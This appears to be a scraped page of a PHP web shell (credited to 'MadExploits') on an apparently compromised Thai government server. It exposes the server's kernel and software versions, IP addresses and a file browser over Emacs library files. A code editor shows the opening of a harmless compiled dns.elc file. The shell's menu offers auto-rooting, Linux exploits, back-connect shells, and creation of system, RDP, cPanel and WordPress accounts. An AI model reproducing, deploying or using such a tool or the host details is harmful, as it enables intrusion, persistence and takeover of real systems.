Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
emacs /
23.1 /
lisp /
net /
[ HOME SHELL ]
Name
Size
Permission
Action
ange-ftp.elc
116.81
KB
-rw-r--r--
browse-url.el.xdg
57.99
KB
-rw-r--r--
browse-url.elc
46.94
KB
-rw-r--r--
dbus.elc
28.38
KB
-rw-r--r--
dig.elc
5.08
KB
-rw-r--r--
dns.elc
11.33
KB
-rw-r--r--
eudc-bob.elc
9.11
KB
-rw-r--r--
eudc-export.elc
5.9
KB
-rw-r--r--
eudc-hotlist.elc
5.71
KB
-rw-r--r--
eudc-vars.elc
14.61
KB
-rw-r--r--
eudc.elc
32.17
KB
-rw-r--r--
eudcb-bbdb.elc
5.41
KB
-rw-r--r--
eudcb-ldap.elc
5.18
KB
-rw-r--r--
eudcb-mab.elc
2.88
KB
-rw-r--r--
eudcb-ph.elc
6.44
KB
-rw-r--r--
goto-addr.elc
9.28
KB
-rw-r--r--
hmac-def.elc
2.07
KB
-rw-r--r--
hmac-md5.elc
2.15
KB
-rw-r--r--
imap.elc
104.58
KB
-rw-r--r--
ldap.elc
14.29
KB
-rw-r--r--
mairix.elc
24.37
KB
-rw-r--r--
net-utils.elc
25.21
KB
-rw-r--r--
netrc.elc
4.79
KB
-rw-r--r--
newst-backend.elc
66.66
KB
-rw-r--r--
newst-plainview.elc
51.17
KB
-rw-r--r--
newst-reader.elc
28.81
KB
-rw-r--r--
newst-ticker.elc
7.82
KB
-rw-r--r--
newst-treeview.elc
67.9
KB
-rw-r--r--
newsticker.elc
1.01
KB
-rw-r--r--
ntlm.elc
12.39
KB
-rw-r--r--
quickurl.elc
16.54
KB
-rw-r--r--
rcirc.elc
89.27
KB
-rw-r--r--
rcompile.elc
3.51
KB
-rw-r--r--
rlogin.elc
10.63
KB
-rw-r--r--
sasl-cram.elc
1.25
KB
-rw-r--r--
sasl-digest.elc
3.75
KB
-rw-r--r--
sasl-ntlm.elc
1.82
KB
-rw-r--r--
sasl.elc
7.39
KB
-rw-r--r--
snmp-mode.elc
15.08
KB
-rw-r--r--
socks.elc
16.21
KB
-rw-r--r--
telnet.elc
9.03
KB
-rw-r--r--
tls.elc
8.04
KB
-rw-r--r--
tramp-cache.elc
8.96
KB
-rw-r--r--
tramp-cmds.elc
9.4
KB
-rw-r--r--
tramp-compat.elc
6
KB
-rw-r--r--
tramp-fish.elc
54.2
KB
-rw-r--r--
tramp-ftp.elc
5.33
KB
-rw-r--r--
tramp-gw.elc
13.27
KB
-rw-r--r--
tramp-smb.elc
50.78
KB
-rw-r--r--
tramp-uu.elc
1.88
KB
-rw-r--r--
tramp.elc
278.99
KB
-rw-r--r--
trampver.elc
1.06
KB
-rw-r--r--
webjump.elc
13.86
KB
-rw-r--r--
xesam.elc
24.5
KB
-rw-r--r--
zeroconf.elc
17.98
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : dns.elc
;ELC ;;; Compiled by mockbuild@c6b8.bsys.dev.centos.org on Thu Feb 19 13:04:30 2015 ;;; from file /builddir/build/BUILD/emacs-23.1/lisp/net/dns.el ;;; in Emacs version 23.1.1 ;;; with all optimizations. ;;; This file uses dynamic docstrings, first added in Emacs 19.29. (if (and (boundp 'emacs-version) (< (aref emacs-version (1- (length emacs-version))) ?A) (or (and (boundp 'epoch::version) epoch::version) (string-lessp emacs-version "19.29"))) (error "`dns.el' was compiled for Emacs 19.29 or later")) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; #@50 How many seconds to wait when doing DNS queries. (defvar dns-timeout 5 (#$ . 601)) #@88 List of DNS servers to query. If nil, /etc/resolv.conf and nslookup will be consulted. (defvar dns-servers nil (#$ . 690)) #@40 Names of query types and their values. (defvar dns-query-types '((A 1) (NS 2) (MD 3) (MF 4) (CNAME 5) (SOA 6) (MB 7) (MG 8) (MR 9) (NULL 10) (WKS 11) (PTR 12) (HINFO 13) (MINFO 14) (MX 15) (TXT 16) (AAAA 28) (SRV 33) (AXFR 252) (MAILB 253) (MAILA 254) (* 255)) (#$ . 819)) #@21 Classes of queries. (defvar dns-classes '((IN 1) (CS 2) (CH 3) (HS 4)) (#$ . 1098)) (defalias 'dns-write-bytes #[(value &optional length) "\306 \206 \307\310\nW\203! \f\311\246B\f\311\245\nT\211\202 *\306\211\n\205<